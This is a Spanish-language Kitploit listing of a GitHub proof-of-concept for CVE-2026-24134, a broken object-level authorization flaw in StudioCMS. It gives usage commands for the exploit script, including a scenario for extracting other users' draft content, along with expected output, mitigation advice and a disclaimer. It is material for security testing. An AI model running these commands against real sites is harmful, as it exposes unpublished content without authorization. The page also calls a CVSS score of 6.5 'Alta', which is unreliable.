Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24134-PoC — Prueba de concepto del exploit para CVE-2026-24134, una vulnerabilidad de Autorización a Nivel de Objeto Rota en StudioCMS, que demuestra el acceso no autorizado a contenido en borrador. | Kitploit
Herramientas/GitHubGitHub/filipegaudard/cve-2026-24134-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Seguridad de APIsPruebas de PenetraciónAprendizaje y Educación
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

Prueba de concepto del exploit para CVE-2026-24134, una vulnerabilidad de Autorización a Nivel de Objeto Rota en StudioCMS, que demuestra el acceso no autorizado a contenido en borrador.

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24134-PoC

Descripción general

Este repositorio contiene la Prueba de Concepto (PoC) para CVE-2026-24134, una vulnerabilidad de Autorización Rota a Nivel de Objeto (BOLA) en StudioCMS.

Contenido

  • cve_2026_24134_poc.py - Script de explotación en Python

Requisitos previos

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

Inicio rápido

Explotación manual

root@kitploit:~
# Uso básico
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# Guardar salida en archivo
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

Pruebas automatizadas

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

Argumentos

Obligatorios

  • -u, --url - URL base de StudioCMS objetivo
  • --uuid - UUID del contenido borrador objetivo

Modo manual

  • --username - Nombre de usuario para autenticación
  • --password - Contraseña para autenticación

Modo de prueba automatizada

  • --auto-test - Habilitar pruebas automatizadas
  • --visitor-user - Nombre de usuario de la cuenta de visitante
  • --visitor-pass - Contraseña de la cuenta de visitante
  • --editor-user - Nombre de usuario de la cuenta de editor
  • --editor-pass - Contraseña de la cuenta de editor

Opcionales

  • --save - Guardar el contenido de la respuesta en un archivo
  • --no-ssl-verify - Deshabilitar la verificación de certificados SSL

Escenarios de ejemplo

Escenario 1: Probar si el sistema es vulnerable

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

Salida esperada si es vulnerable:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

Salida esperada si está parcheado:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

Escenario 2: Extraer contenido borrador

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

Esto guardará el contenido completo del borrador en draft_{uuid}.html.

Comprender la salida

Indicadores de éxito

  • [+] - Operación exitosa (verde)
  • [*] - Mensaje informativo (azul)
  • [!] - Advertencia (amarillo)
  • [-] - Error (rojo)

Códigos de estado HTTP

  • 200 OK - ¡Vulnerable! Se accedió al contenido borrador
  • 403 Forbidden - ¡Parcheado! Autorización adecuada implementada
  • 404 Not Found - UUID inválido o implementación segura (devuelve 404 en lugar de revelar la existencia)
  • 401 Unauthorized - Falló la autenticación

Mitigación

Si está ejecutando una versión vulnerable de StudioCMS, actualice inmediatamente a la versión parcheada.

Para desarrolladores

El problema real: Las comprobaciones de autorización se realizaban en el lado del cliente (JavaScript), no en el servidor.

Según el equipo de desarrollo:

"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."

La solución: Mover la autorización del cliente al servidor.

Principio clave: Nunca confíe en el cliente. La seguridad del lado del cliente = mejora de la experiencia de usuario. La seguridad del lado del servidor = protección real.

Aviso legal

IMPORTANTE: Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

  • Úsela solo contra sistemas que posea o para los cuales tenga permiso explícito por escrito para probar
  • El acceso no autorizado a sistemas informáticos es ilegal en la mayoría de las jurisdicciones
  • El autor no asume ninguna responsabilidad por el mal uso de esta herramienta
  • Siga siempre las prácticas de divulgación responsable

Referencias

  • CVE: CVE-2026-24134
  • CVSS: 6.5 Alta
  • CWE: CWE-639
  • OWASP: API1:2023 - Autorización Rota a Nivel de Objeto

Contacto

Para preguntas sobre esta PoC o la vulnerabilidad:

  • Autor: Filipe Gaudard

Licencia

Esta PoC se publica con fines educativos. Úsela de manera responsable y ética.

Descargar herramienta